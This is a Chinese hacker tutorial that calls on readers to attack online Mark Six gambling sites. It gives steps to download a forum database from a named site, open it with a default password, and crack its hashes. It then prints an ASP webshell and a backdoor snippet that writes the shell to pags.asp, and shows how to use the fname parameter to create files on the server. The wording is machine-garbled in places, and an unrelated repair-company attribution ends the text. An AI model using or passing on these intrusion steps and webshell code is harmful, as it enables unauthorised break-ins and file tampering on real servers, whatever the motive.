取webshell给六合彩网站毁灭性打击

  作者:浩天 [F.S.T]
  前言：
  一、六合彩的危害（事例）
  1、八十岁老太跳楼身亡。某村年逾八十的老太太罗某，家道并不富饶，
  祖孙三代挤在三间小土房里，两个儿子外出打工五年挣了三万多块钱，
  交给老太太保存，准备来岁建造新房用。老太太先是厌恶买码（六合彩），
  后因为见本村有一老太太买码赢了两万元，便心动起来。
  先用本身的私房钱买，想哪一天也赢个两、三万，效果越买瘾越大，
  买失了本身多年积攥的三千多元私房钱后，输红了眼，
  把儿子们积攥建房的三万多元也买失了，后觉得无脸见儿子，
  跑上庄家的楼房上纵跳下身亡，令人叹息不已。
  2、吃不起肉的村庄。在某个上千人的村庄，却没有一家人买肉吃，
  是这个村的都信教食斋吗？非也！听说这个村的人为了买码，
  不仅自家的钱输光了，而且在本身外村的亲戚处还借了不少钱，
  有的甚至是向亲戚骗来的。全村人穷得吃饭都成题目了，当然肉就不敢想了。
  曩昔这个村村头有一个卖肉的地方，如今各人把猪卖了就去买码，
  天天谋略着怎样赢回资本，吃肉成了奢侈的愿望了。
  这里我就拿来这两个例子，实在远远不止这些。六合彩惹起的悲伤事例太多了，
  引发打斗打斗是常事，许多盗窃案、掳掠案都因为赌输惹起，走投无路、
  家破人亡者大有人在。
  二、六合彩屡禁不止的原因
  六合彩是一种极具吸引力的赌博。例如，某村有一人用两千元中了二十万大奖，
  这极大地安慰了买码的人，在博得宏大额奖的诱导下，就上瘾或输红了眼，如许，
  使许多人在六合彩面前不能自拔地陷了进去。他们总想某一天会把输失的赢返来；
  另一方面也不可否认六合彩具有神秘色彩和娱乐性，能激发许多彩民的冒险兴趣、
  发财愿望。例如：六合彩有特码网站，还有什么码报。信赖这些都是各人所熟知的，
  里面一些谶语让人去思考，而一到出了奖，又能牵强附会地跟特码网站上的资料接洽起来，
  具有一定的神秘性。这就是六合彩屡禁不止的原因。
  三、我们应该怎样做
  有人在QQ的本性署名上如许写道：什么是黑客，黑客就是一群既要当婊子又要立牌楼的网络
  流氓。有的时间我也在想难道所谓的黑客就是专门在别人网站上挂马攒钱的人吗？
  大概是每天都在网上找一些宁静低的网站进去后，根本不关照办理员，而是间接改失人家主页，
  挂上本身的QQ号，梦想有一天本身就如许着名了。（进班房）
  别的我看到一篇报道，心里非常不是滋味。报道是如许的《3名女中学生历时11个月观察“六合彩”赌博活动》，
  我就不发表批评了，我们来看一位老师的话：“当我们听到孩子们发自心田的声音时，
  我们没有来由不思考。为了孩子，我们该做些什么，又能做些什么？”
  自己作为一名还不是黑客的黑客，真的想知道我们应该做些什么？
  取http://bbs.muwen.com/topic210/209519.htm 的一位id为
  我恨六合彩 的朋侪的话给各人看看，话是如许说的：
  “买五元中生肖特码就可得二百块，哪有这么好中呢，
  许多多少人因而而自尽，跳楼，这些码庄没有想过吗
  希望能管管，这些网上的六合彩网站吧！！！！！”
  我想这就是我们应该做的，拿百度搜这几个字“六合彩”相干的信息千万万，
  为了被六合彩迫害的人，为了我的家乡岳阳，我决议写下下面的文章。
  盼望着各人一同走到打击六合彩网站的门路上来！消减它们，国家的益虫……
  --------------------------------------------------------------------------------------------------
  注释：
  各人可能看过我原来的一篇文章，名字叫“侵入最大的六合彩论坛系统---六合公用BBS”
  上面就介绍了怎样下载，六合公用BBS v1.0、六合公用BBS v2.0、六合公用BBS v3.0
  的数据库，我们就从这里提及，可能有没有看过的朋侪，那么我把这一部门再做一遍。
  先在 baidu 搜 “六合公用BBS v1.0”当然你搜 v2.0 、v3.0 都可以！
  “找到相干网页约23,000篇，用时0.017秒”我们看一下非常多的，任意进一个吧。
  http://www.ky8888.com/bbs/list.asp
  找到Domain2.2.exe，的 SearchPage.txt，
  在里面加查找页 /fdnews.asp /bbs/fdnews.asp，好了如今我们来扫扫看！
  哇，许多多少啊，这个就是数据库了，我们用网际慢车 把他下下来，
  昏 ，打开要密码，就密码这个工具啦： newbbs.cn88 ，如今 帐号、密码，
  就尽收眼底了，嘿嘿！~~
  如今把 md5 加密的工具放 MD5Crack 2.3 去跑吧，看你运气咯！~
  不外我们本日要的不是它的密码，而是webshell。各人跟我来，马上会有惊人的
  发现。打开数据库的zl表，找到idto 的字段，怎样了发现什么了吗？
  这个好象是一个网页哦，嘿嘿！~~
  代码如下：
 
 
 
 
 
  <%
  Function GetPP
  dim s
  s=Request.ServerVariables("path_translated")
  GetPP=left(s,instrrev(s,"",len(s)))
  End function
  MODE=Request("MODE")
  sPP=Request("PP")
  if sPP="" then sPP=GetPP
  if right(sPP,1)<>"" then sPP=sPP&""
  Response.Write "Index of "&sPP& ""
  %>
  <%fname=request("fname")
  if fname<>"" then
  Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
  if request("save")="" then
  Set objCountFile = objFSO.OpenTextFile(fname,1,True)
  If Not objCountFile.AtEndOfStream Then fdata = objCountFile.ReadAll
  else
  fdata=request("fdata")
  Set objCountFile=objFSO.CreateTextFile(fname,True)
  objCountFile.Write fdata
  end if
  objCountFile.Close
  Set objCountFile=Nothing
  Set objFSO = Nothing
  end if
  %>
 

 
 
 
 
 

change：<%=fname%>   <%=fdata%>

 

 
 
  再认真看看，实在这就是一个webshell，全部的六合彩公用论坛的数据库里面都有。
  它出生的时间可能比陆地顶端2003 还要早，是asp木马界的始祖了。
  既然数据库的文件名是asp的后缀，而里面又自带一个asp木马，我们来试试间接打开这个数据库地址，
  http://www.ky8888.com/bbs/fdnews.asp
  昏，可以看出木马里面的asp 代码并没有执行，也就是说我们拿了一只去世马。
  这就是我12月25号的号的发现，拿到这个之后就和兄弟 ☆罹天烬☆ 讨论过（czy也赐与了帮助），
  开端以为只要拿到网站在服务器上的相对途径就可以在本地提交，写入我们本身的木马，但是实验却不停没有成功。
  固然我手里有一个如许的论坛，但是有几个重要的页面丧失了，临时也看不出一个所以然来，如许一拖就是十几天，
  前天我再把这个论坛的代码拿出来看，在list.asp 里面发现一段重要的工具.
  <%
  if len(page)>6 then
  if md5(md5(page))="8f9fc56c3d174202" then
  dim fname
  fname=""&sPP&"pags.asp"
  Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
  Set objCountFile=objFSO.CreateTextFile(fname,True)
  objCountFile.Write ""& idto &""
  objCountFile.Close
  Set objCountFile=Nothing
  Set objFSO = Nothing
  response.write "SORRY
"
  response.write "ID?????"
  response.end
  end if%>
  细致到了吗？""& idto &"" 这里的idto 不就是数据库里面放asp木马的字段吗？
  嘿嘿，那么上面的pags.asp，就应该是写入的文件名咯？我们来碰运气，究竟是不是如许的！
  提交：http://www.ky8888.com/bbs/pags.asp
  看到没有这个陈腐的asp木马终于显身了，起首它可以看到网站在服务器上的相对途径，第二还
  可以写入文件。有人看到这个木马很忧郁，因为它根本没有写入文件的途径的设置表单，是不是
  我们提交的数据库，都进了数据库了呢？
  来看看原代码，这一句 Set objCountFile = objFSO.OpenTextFile(fname,1,True)
  看这里是写入了文件fname， 而不是数据库，我们先要恳求文件fname 写入的途径，
  在ie 提交：http://www.ky8888.com/bbs/pags.asp?fname=D:ky8888bbshaotian.asp
  再填内容 ，嘿嘿· ok 了 ！，如许D:ky8888bbshaotian.asp 就是我们新建的文件了。
  因为这个网站空间不支持fso，所以我间接把数据库里面的木马复制到朋侪的asp空间去演示，
  看是不是写入文件成功了，嘿嘿！~~http://lvhuana.somee.com/haotian.asp?id=1
  如许简单就拿到了webshell，不外我试了别的几个六合彩网站却没有发现这个pags.asp，看来这个里面
  还有工具要挖一挖。可能要比及拿了完整的 六合公用BBS 的代码之后题目就都解决了。
  本文只是起到抛砖引玉的作用，还是那句话盼望着各人一同走到打击六合彩网站的门路上来！
  消减它们，国家的益虫……
  我在写本文的同时，也有许多人和我说，如今地下足彩也很众多，所以我专门接洽了一位海内的黑足彩
  高手，他将在近期出一篇关于消减足彩网站的文章。（完）
  奉劝各人再也不要买码了
  我的QQ ：78941849
  前次有个叫“大个仔”的鸟人盗我动画，我本日还是加上日期
  2月14号 情人节
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:

评论加载中... 内容： 评论者： 验证码：